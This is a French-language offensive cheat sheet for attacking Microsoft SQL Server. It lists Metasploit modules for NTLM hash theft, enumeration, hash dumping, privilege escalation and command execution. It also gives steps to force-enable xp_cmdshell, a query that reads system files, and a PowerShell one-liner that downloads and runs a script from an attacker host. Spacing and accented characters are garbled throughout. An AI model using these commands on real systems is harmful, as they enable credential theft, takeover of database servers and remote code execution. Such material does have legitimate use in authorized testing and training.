#Vol de NTLMmsf> useauxiliary/admin/mssql/mssql_ntlm_stealer#Steal NTLM hash, before executing run Responder#Info gatheringmsf> useadmin/mssql/mssql_enummsf> useadmin/mssql/mssql_enum_domain_accountsmsf> useadmin/mssql/mssql_enum_sql_loginsmsf> useauxiliary/admin/mssql/mssql_findandsampledatamsf> useauxiliary/scanner/mssql/mssql_hashdumpmsf> useauxiliary/scanner/mssql/mssql_schemadumpmsf> useauxiliary/admin/mssql/mssql_findandsampledatamsf> useauxiliary/admin/mssql/mssql_idf#Privescmsf> useexploit/windows/mssql/mssql_linkcrawlermsf> useadmin/mssql/mssql_escalate_execute_as#If the user has IMPERSONATION privilege, this will try to escalatemsf> useadmin/mssql/mssql_escalate_dbowner#Escalate from db_owner to sysadmin#Execution de codemsf> useadmin/mssql/mssql_execmsf> useexploit/windows/mssql/mssql_payload#Ajouter un nouvel administrateur depuis une session meterpretermsf> usewindows/manage/mssql_local_auth_bypass
SELECT*FROMOPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents
Exรฉcution de code
Pour executer du code sur MSSQL, il faut que xp_cmdshell soit activรฉ. Si il ne l'est pas, il est possible de forcer son activation avec les droits suffisants.
Vรฉrification
> xp_cmdshell `whoami`;
> go
Activer xp_cmdshell
> EXEC SP_CONFIGURE 'xp_cmdshell' , 1;
> reconfigure;
> go
> xp_cmdshell `whoami`;
> go
Forcer l'activation
> EXEC SP_CONFIGURE 'show advanced options', 1;
> reconfigure;
> go
> EXEC SP_CONFIGURE 'xp_cmdshell' , 1;
> reconfigure;
> go
> xp_cmdshell 'whoami';
> go
Tรฉlรฉchargement de fichier
> xp_cmdshell "powershell.exe -exec bypass iex(new-object net.webclient).downloadstring('http://<your ip>:<port>/script.ps1')";
> go